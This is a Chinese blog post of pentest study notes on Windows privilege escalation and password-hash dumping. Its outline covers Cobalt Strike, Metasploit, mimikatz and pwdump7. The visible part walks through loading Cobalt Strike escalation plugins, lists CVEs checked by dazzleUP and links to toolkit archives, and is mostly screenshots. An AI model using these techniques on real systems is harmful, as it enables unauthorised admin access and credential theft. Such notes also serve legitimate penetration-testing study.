<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>提权与hash读取 | 小白帽</title>
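    <!-- No maximum-scale: capping zoom blocks pinch-to-zoom for low-vision users (WCAG 1.4.4). -->
    <meta name="viewport" content="width=device-width, initial-scale=1">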
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="">
    <meta name="description" content="Cobalt strike插件获取与加载                                                                                             image.png">
<meta property="og:type" content="article">
<meta property="og:title" content="提权与hash读取">
<meta property="og:url" content="https://www.yuque.com/xiaogege-yxttw/2020/08/06/gca6ds/index.html">
<meta property="og:site_name" content="小白帽">
<meta property="og:description" content="Cobalt strike插件获取与加载                                                                                             image.png">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166883843-b72659ca-5d34-4936-ba24-5e350c0fa059.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=828&originWidth=1547&size=180848&status=done&style=none&width=773.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166941561-5f3c4737-040c-4ec2-a4bc-96b06adf02a4.png#align=left&display=inline&height=131&margin=%5Bobject%20Object%5D&name=image.png&originHeight=261&originWidth=1544&size=111899&status=done&style=none&width=772">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166969324-7180629a-5271-4c88-9fdf-b5da64c79cea.png#align=left&display=inline&height=76&margin=%5Bobject%20Object%5D&name=image.png&originHeight=152&originWidth=1918&size=9766&status=done&style=none&width=959">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925819177-4400dd87-2214-4d1d-adbf-488394802020.png#align=left&display=inline&height=149&margin=%5Bobject%20Object%5D&name=image.png&originHeight=298&originWidth=1546&size=136987&status=done&style=none&width=773">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925883537-998ec7ea-d39d-404c-8d4c-1554ffd6391a.png#align=left&display=inline&height=208&margin=%5Bobject%20Object%5D&name=image.png&originHeight=415&originWidth=622&size=26255&status=done&style=none&width=311">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925903776-edaf48f5-bedc-403d-a5af-90982c2df655.png#align=left&display=inline&height=333&margin=%5Bobject%20Object%5D&name=image.png&originHeight=665&originWidth=1920&size=36826&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925967065-384d6fc1-805c-4d3b-918f-094805b40d07.png#align=left&display=inline&height=169&margin=%5Bobject%20Object%5D&name=image.png&originHeight=337&originWidth=1539&size=153952&status=done&style=none&width=769.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925994576-c2883d29-3d97-48f7-b913-94ca72e92c2d.png#align=left&display=inline&height=242&margin=%5Bobject%20Object%5D&name=image.png&originHeight=485&originWidth=1538&size=180228&status=done&style=none&width=769">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596532091691-deab4768-1787-4255-93e2-3892011d8f0b.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1543&size=210678&status=done&style=none&width=771.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595926243392-0d60b882-8fe0-4359-bf8a-89fdda70b939.png#align=left&display=inline&height=65&margin=%5Bobject%20Object%5D&name=image.png&originHeight=130&originWidth=1918&size=18089&status=done&style=none&width=959">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1595926383488-cba9dd90-c184-4dc5-aa78-59a2be84eb96.png#align=left&display=inline&height=267&margin=%5Bobject%20Object%5D&name=image.png&originHeight=534&originWidth=1443&size=142491&status=done&style=none&width=721.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166663037-e40046b4-b8b9-4e95-a672-7b79a10c4806.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1543&size=290531&status=done&style=none&width=771.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596607756437-39ba810f-575a-4c48-b6a2-e4483dc9f953.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1542&size=272848&status=done&style=none&width=771">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000779952-4cd72eaa-5b05-4eb8-be46-d00f0b1beb26.png#align=left&display=inline&height=147&margin=%5Bobject%20Object%5D&name=image.png&originHeight=294&originWidth=768&size=150643&status=done&style=none&width=384">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000890644-6078e18e-ef93-4d8d-9824-603238f194b9.png#align=left&display=inline&height=398&margin=%5Bobject%20Object%5D&name=image.png&originHeight=796&originWidth=686&size=442463&status=done&style=none&width=343">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000469388-84118202-63c8-4b65-9ce5-04dadf7a83d9.png#align=left&display=inline&height=214&margin=%5Bobject%20Object%5D&name=image.png&originHeight=429&originWidth=837&size=302009&status=done&style=none&width=418.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000424542-fc3ea812-cffd-42e3-916e-df3a180d6d28.png#align=left&display=inline&height=224&margin=%5Bobject%20Object%5D&name=image.png&originHeight=448&originWidth=843&size=290122&status=done&style=none&width=421.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/gif/258143/1596009266490-76f7778a-1f4f-47e3-b0d0-93b12565bb24.gif#align=left&display=inline&height=650&margin=%5Bobject%20Object%5D&name=356325576.gif&originHeight=650&originWidth=979&size=670606&status=done&style=none&width=979">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/gif/258143/1596010859066-bacecdf1-6edb-4583-b67c-679a78109ab8.gif#align=left&display=inline&height=650&margin=%5Bobject%20Object%5D&name=2.gif&originHeight=650&originWidth=979&size=782929&status=done&style=none&width=979">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596093953631-d24a84b5-576c-46f2-aeb2-f5438eb9286d.png#align=left&display=inline&height=271&margin=%5Bobject%20Object%5D&name=image.png&originHeight=542&originWidth=1199&size=340191&status=done&style=none&width=599.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596110356894-42232318-6562-45fd-9eb2-4633ed105948.png#align=left&display=inline&height=56&margin=%5Bobject%20Object%5D&name=image.png&originHeight=112&originWidth=744&size=9918&status=done&style=none&width=372">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596110176792-e82ae15d-5951-40e8-a6f1-b88ee2ab5f60.png#align=left&display=inline&height=360&margin=%5Bobject%20Object%5D&name=image.png&originHeight=720&originWidth=710&size=60918&status=done&style=none&width=355">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000569316-64cbe683-6fb9-41eb-bb90-8196371282ef.png#align=left&display=inline&height=368&margin=%5Bobject%20Object%5D&name=image.png&originHeight=736&originWidth=1388&size=99563&status=done&style=none&width=694">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596604208017-b970f6a2-9ea9-4151-b062-2babcf0194f5.png#align=left&display=inline&height=111&margin=%5Bobject%20Object%5D&name=image.png&originHeight=222&originWidth=630&size=69607&status=done&style=none&width=315">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596605167992-81ee5259-2054-47d2-80c9-b7f93992ccf3.png#align=left&display=inline&height=145&margin=%5Bobject%20Object%5D&name=image.png&originHeight=290&originWidth=723&size=31801&status=done&style=none&width=361.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596605194766-0e11828f-9540-42c4-bf4a-18a496b21141.png#align=left&display=inline&height=131&margin=%5Bobject%20Object%5D&name=image.png&originHeight=261&originWidth=825&size=13034&status=done&style=none&width=412.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596891469135-620967c1-d803-4872-ae43-cfeaff5e3f6a.png#align=left&display=inline&height=133&margin=%5Bobject%20Object%5D&name=image.png&originHeight=265&originWidth=801&size=20220&status=done&style=none&width=400.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877277818-50b18d70-8d61-4439-9ffa-16db6fe5308d.png#align=left&display=inline&height=307&margin=%5Bobject%20Object%5D&name=image.png&originHeight=614&originWidth=838&size=41359&status=done&style=none&width=419">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877444914-f56ff8e1-37bb-4625-86be-75a323e50316.png#align=left&display=inline&height=359&margin=%5Bobject%20Object%5D&name=image.png&originHeight=718&originWidth=781&size=37748&status=done&style=none&width=390.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596878161275-a41963ad-fce9-4c76-aea7-0be5c57ebc31.png#align=left&display=inline&height=153&margin=%5Bobject%20Object%5D&name=image.png&originHeight=305&originWidth=1055&size=88821&status=done&style=none&width=527.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877960841-32d91383-e94e-4bae-a735-8643a3d32347.png#align=left&display=inline&height=78&margin=%5Bobject%20Object%5D&name=image.png&originHeight=156&originWidth=618&size=10573&status=done&style=none&width=309">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596608521335-f990db60-acfd-4de2-97f9-17ca8ba2726e.png#align=left&display=inline&height=332&margin=%5Bobject%20Object%5D&name=image.png&originHeight=664&originWidth=1920&size=59020&status=done&style=none&width=960">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609640544-3e20638a-338e-4161-84e1-0c102c3b9d45.png#align=left&display=inline&height=274&margin=%5Bobject%20Object%5D&name=image.png&originHeight=547&originWidth=1059&size=186262&status=done&style=none&width=529.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609726168-d450dd2b-e970-4422-9897-e48176916f36.png#align=left&display=inline&height=144&margin=%5Bobject%20Object%5D&name=image.png&originHeight=144&originWidth=1054&size=32038&status=done&style=none&width=1054">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609782138-e97f2179-d252-4a8f-a460-d384e1e6f469.png#align=left&display=inline&height=303&margin=%5Bobject%20Object%5D&name=image.png&originHeight=303&originWidth=1059&size=147309&status=done&style=none&width=1059">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596610350819-1360ceed-cdbf-4c28-aa08-9b4938983618.png#align=left&display=inline&height=703&margin=%5Bobject%20Object%5D&name=image.png&originHeight=703&originWidth=835&size=98614&status=done&style=none&width=835">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596610363202-583ab935-4d08-48ac-8ff1-c2f74d90a3ee.png#align=left&display=inline&height=677&margin=%5Bobject%20Object%5D&name=image.png&originHeight=677&originWidth=733&size=135271&status=done&style=none&width=733">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596604853921-977a6384-5251-46a9-8977-a9c08820f9be.png#align=left&display=inline&height=103&margin=%5Bobject%20Object%5D&name=image.png&originHeight=206&originWidth=519&size=13475&status=done&style=none&width=259.5">
<meta property="article:published_time" content="2020-08-06T14:49:23.000Z">
<meta property="article:modified_time" content="2020-08-14T15:17:20.626Z">
<meta property="article:author" content="无名之辈">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166883843-b72659ca-5d34-4936-ba24-5e350c0fa059.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=828&originWidth=1547&size=180848&status=done&style=none&width=773.5">
    
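    <link rel="shortcut icon" href="/favicon.ico">
    <!-- Theme CSS pulled from a third-party CDN over an explicit https: URL (was
         protocol-relative). The @latest tag floats, so the served file can change
         at any time and no subresource-integrity hash can be attached to it; pin
         an exact version and add integrity + crossorigin once the version is fixed. -->
    <link rel="stylesheet" href="https://unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <!-- Global array, presumably the theme's queue for lazily loaded scripts.
         Inline script: a strict Content-Security-Policy would need a nonce/hash for it. -->
    <script>window.lazyScripts=[]</script>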

    <!-- custom head -->
    

<meta name="generator" content="Hexo 4.2.1"></head>

<body>


    <main id="main">
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">提权与hash读取</h1>
        <h5 class="subtitle">
            
                <time datetime="2020-08-06T14:49:23.000Z" itemprop="datePublished" class="page-time">
  2020-08-06
</time>


            
        </h5>
    </div>

    


</header>
<meta name="referrer" content="no-referrer" />
<script type="text/javascript" src="hexo_resize_image.js"></script>

<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Cobalt-strike"><span class="post-toc-number">1.</span> <span class="post-toc-text">Cobalt strike</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#插件获取与加载"><span class="post-toc-number">1.1.</span> <span class="post-toc-text">插件获取与加载</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Cobalt-strike-提权"><span class="post-toc-number">1.2.</span> <span class="post-toc-text">Cobalt strike 提权</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#elevate-cna-提权"><span class="post-toc-number">1.2.0.1.</span> <span class="post-toc-text">elevate.cna 提权</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#dazzleUP（漏洞检测）"><span class="post-toc-number">1.3.</span> <span class="post-toc-text">dazzleUP（漏洞检测）</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#梼杌taowu-cobalt-strike-master-zip"><span class="post-toc-number">1.4.</span> <span class="post-toc-text">梼杌taowu-cobalt-strike-master.zip</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#提权完成标志"><span class="post-toc-number">1.5.</span> <span class="post-toc-text">提权完成标志</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#MSF-提权"><span class="post-toc-number">2.</span> <span class="post-toc-text">MSF 提权</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#常规提权"><span class="post-toc-number">3.</span> <span class="post-toc-text">常规提权</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#CVE-2019-0803CVE-2019-0803-zip"><span class="post-toc-number">3.1.</span> <span 
class="post-toc-text">CVE-2019-0803CVE-2019-0803.zip</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#CVE-2020-0787BitsArbitraryFileMoveExploit-zip"><span class="post-toc-number">3.2.</span> <span class="post-toc-text">CVE-2020-0787BitsArbitraryFileMoveExploit.zip</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#ms16-32-还未测试-Invoke-MS16-032-ps1"><span class="post-toc-number">3.3.</span> <span class="post-toc-text">ms16-32(还未测试)Invoke-MS16-032.ps1</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#本地提权"><span class="post-toc-number">3.3.0.1.</span> <span class="post-toc-text">本地提权</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#远程给加载提权"><span class="post-toc-number">3.3.0.2.</span> <span class="post-toc-text">远程给加载提权</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#dazzleUP（漏洞检测）dazzleUP-zip"><span class="post-toc-number">3.4.</span> <span class="post-toc-text">dazzleUP（漏洞检测）dazzleUP.zip</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#BadPotato-提权Release-zip"><span class="post-toc-number">3.5.</span> <span class="post-toc-text">BadPotato 提权Release.zip</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#提权查询"><span class="post-toc-number">4.</span> <span class="post-toc-text">提权查询</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Hash-读取（管理员权限）"><span class="post-toc-number">5.</span> <span class="post-toc-text">Hash 读取（管理员权限）</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#使用-pwdump7-获取-hash"><span class="post-toc-number">5.1.</span> <span class="post-toc-text">使用 pwdump7 获取 hash</span></a><ol class="post-toc-child"><li 
class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#提权"><span class="post-toc-number">5.1.0.1.</span> <span class="post-toc-text">提权</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#hash-读取Pwdump7-zip"><span class="post-toc-number">5.1.0.2.</span> <span class="post-toc-text">hash 读取Pwdump7.zip</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#拿到-hash-直接破解："><span class="post-toc-number">5.1.0.3.</span> <span class="post-toc-text">拿到 hash 直接破解：</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#mimikatz-抓取-hash"><span class="post-toc-number">5.2.</span> <span class="post-toc-text">mimikatz 抓取 hash</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#执行命令mimikatz-trunk-zip"><span class="post-toc-number">5.2.0.1.</span> <span class="post-toc-text">执行命令mimikatz_trunk.zip</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#如果权限不足则会提示"><span class="post-toc-number">5.2.0.2.</span> <span class="post-toc-text">如果权限不足则会提示</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#MSF-抓取-hash"><span class="post-toc-number">5.3.</span> <span class="post-toc-text">MSF 抓取 hash</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Cobalt-Strike-抓取-hash"><span class="post-toc-number">5.4.</span> <span class="post-toc-text">Cobalt Strike 抓取 hash</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#1、抓取-hash（通过-cobalt-strike）"><span class="post-toc-number">5.4.0.1.</span> <span class="post-toc-text">1、抓取 hash（通过 cobalt strike）</span></a></li></ol></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#端口转发"><span 
class="post-toc-number">6.</span> <span class="post-toc-text">端口转发</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#MSF-端口转发"><span class="post-toc-number">6.1.</span> <span class="post-toc-text">MSF 端口转发</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#ew"><span class="post-toc-number">6.2.</span> <span class="post-toc-text">ew</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#常见问题解决办法"><span class="post-toc-number">6.3.</span> <span class="post-toc-text">常见问题解决办法</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#服务端口默认被修改"><span class="post-toc-number">6.3.0.1.</span> <span class="post-toc-text">服务端口默认被修改</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#服务器未开启-3389"><span class="post-toc-number">6.3.0.2.</span> <span class="post-toc-text">服务器未开启 3389</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#服务器网络环境处于内网："><span class="post-toc-number">6.3.0.3.</span> <span class="post-toc-text">服务器网络环境处于内网：</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#防护验证规则-IP-或计算机名："><span class="post-toc-number">6.3.0.4.</span> <span class="post-toc-text">防护验证规则&#x2F;IP 或计算机名：</span></a></li></ol></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#注意："><span class="post-toc-number">7.</span> <span class="post-toc-text">注意：</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#学习文档"><span class="post-toc-number">8.</span> <span class="post-toc-text">学习文档</span></a></li></ol>
        </nav>
    </aside>


<article id="post-gca6ds"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">提权与hash读取</h1>
        <div class="post-meta">
            <time class="post-time" title="2020-08-06 22:49:23" datetime="2020-08-06T14:49:23.000Z"  itemprop="datePublished">2020-08-06</time>

            


            


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h1 id="Cobalt-strike"><a href="#Cobalt-strike" class="headerlink" title="Cobalt strike"></a>Cobalt strike</h1><h2 id="插件获取与加载"><a href="#插件获取与加载" class="headerlink" title="插件获取与加载"></a><a href="https://mp.weixin.qq.com/s/CEI1XYkq2PZmYsP0DRU7jg" target="_blank" rel="noopener">插件获取与加载</a></h2><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166883843-b72659ca-5d34-4936-ba24-5e350c0fa059.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=828&originWidth=1547&size=180848&status=done&style=none&width=773.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166941561-5f3c4737-040c-4ec2-a4bc-96b06adf02a4.png#align=left&display=inline&height=131&margin=%5Bobject%20Object%5D&name=image.png&originHeight=261&originWidth=1544&size=111899&status=done&style=none&width=772" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>表示加载成功</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166969324-7180629a-5271-4c88-9fdf-b5da64c79cea.png#align=left&display=inline&height=76&margin=%5Bobject%20Object%5D&name=image.png&originHeight=152&originWidth=1918&size=9766&status=done&style=none&width=959" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="Cobalt-strike-提权"><a href="#Cobalt-strike-提权" class="headerlink" title="Cobalt strike 提权"></a>Cobalt strike 提权</h2><h4 id="elevate-cna-提权"><a href="#elevate-cna-提权" class="headerlink" title="elevate.cna 提权"></a>elevate.cna 提权</h4><p>1、加载脚本</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925819177-4400dd87-2214-4d1d-adbf-488394802020.png#align=left&display=inline&height=149&margin=%5Bobject%20Object%5D&name=image.png&originHeight=298&originWidth=1546&size=136987&status=done&style=none&width=773" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>2、脚本选择</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925883537-998ec7ea-d39d-404c-8d4c-1554ffd6391a.png#align=left&display=inline&height=208&margin=%5Bobject%20Object%5D&name=image.png&originHeight=415&originWidth=622&size=26255&status=done&style=none&width=311" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>3、脚本加载成功</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925903776-edaf48f5-bedc-403d-a5af-90982c2df655.png#align=left&display=inline&height=333&margin=%5Bobject%20Object%5D&name=image.png&originHeight=665&originWidth=1920&size=36826&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>4、脚本使用</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925967065-384d6fc1-805c-4d3b-918f-094805b40d07.png#align=left&display=inline&height=169&margin=%5Bobject%20Object%5D&name=image.png&originHeight=337&originWidth=1539&size=153952&status=done&style=none&width=769.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595925994576-c2883d29-3d97-48f7-b913-94ca72e92c2d.png#align=left&display=inline&height=242&margin=%5Bobject%20Object%5D&name=image.png&originHeight=485&originWidth=1538&size=180228&status=done&style=none&width=769" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>通过 net user 查询已经为管理员权限，并且会自动新增一个</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596532091691-deab4768-1787-4255-93e2-3892011d8f0b.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1543&size=210678&status=done&style=none&width=771.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="dazzleUP（漏洞检测）"><a href="#dazzleUP（漏洞检测）" class="headerlink" title="dazzleUP（漏洞检测）"></a>dazzleUP（漏洞检测）</h2><p>适用：Windows 10</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">DCOM/NTLM Reflection (Rotten/Juicy Potato) Vulnerability</span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-0836</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-0841</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1064</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1130</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1253</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1385</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1388</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1405</span></span><br><span class="line">CVE<span class="literal">-2019</span><span class="literal">-1315</span></span><br><span class="line">CVE<span class="literal">-2020</span><span class="literal">-0787</span></span><br><span class="line">CVE<span class="literal">-2020</span><span class="literal">-0796</span></span><br></pre></td></tr></table></figure>

<p>1、脚本加载<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365058-75ce7cc5-9373-4d5d-8c65-9cb244eb55b0.zip?_lake_card=%7B%22uid%22%3A%221596093526438-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365058-75ce7cc5-9373-4d5d-8c65-9cb244eb55b0.zip%22%2C%22name%22%3A%22dazzleUP-master.zip%22%2C%22size%22%3A90335%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22TWeKr%22%2C%22card%22%3A%22file%22%7D">dazzleUP-master.zip</a><br>dazzleUP.cna 和 dazzleUP_Reflective_DLL.dll 放在同一目录下</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595926243392-0d60b882-8fe0-4359-bf8a-89fdda70b939.png#align=left&display=inline&height=65&margin=%5Bobject%20Object%5D&name=image.png&originHeight=130&originWidth=1918&size=18089&status=done&style=none&width=959" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>2、直接在 beacon 下使用</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595926383488-cba9dd90-c184-4dc5-aa78-59a2be84eb96.png#align=left&display=inline&height=267&margin=%5Bobject%20Object%5D&name=image.png&originHeight=534&originWidth=1443&size=142491&status=done&style=none&width=721.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="梼杌taowu-cobalt-strike-master-zip"><a href="#梼杌taowu-cobalt-strike-master-zip" class="headerlink" title="梼杌taowu-cobalt-strike-master.zip"></a><a href="https://github.com/pandasec888/taowu-cobalt-strike" target="_blank" rel="noopener">梼杌</a><a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365152-637cd483-0c06-4744-8d0b-36220837c966.zip?_lake_card=%7B%22uid%22%3A%221596166612030-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365152-637cd483-0c06-4744-8d0b-36220837c966.zip%22%2C%22name%22%3A%22taowu-cobalt-strike-master.zip%22%2C%22size%22%3A20362697%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22Y90Oz%22%2C%22card%22%3A%22file%22%7D">taowu-cobalt-strike-master.zip</a></h2><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
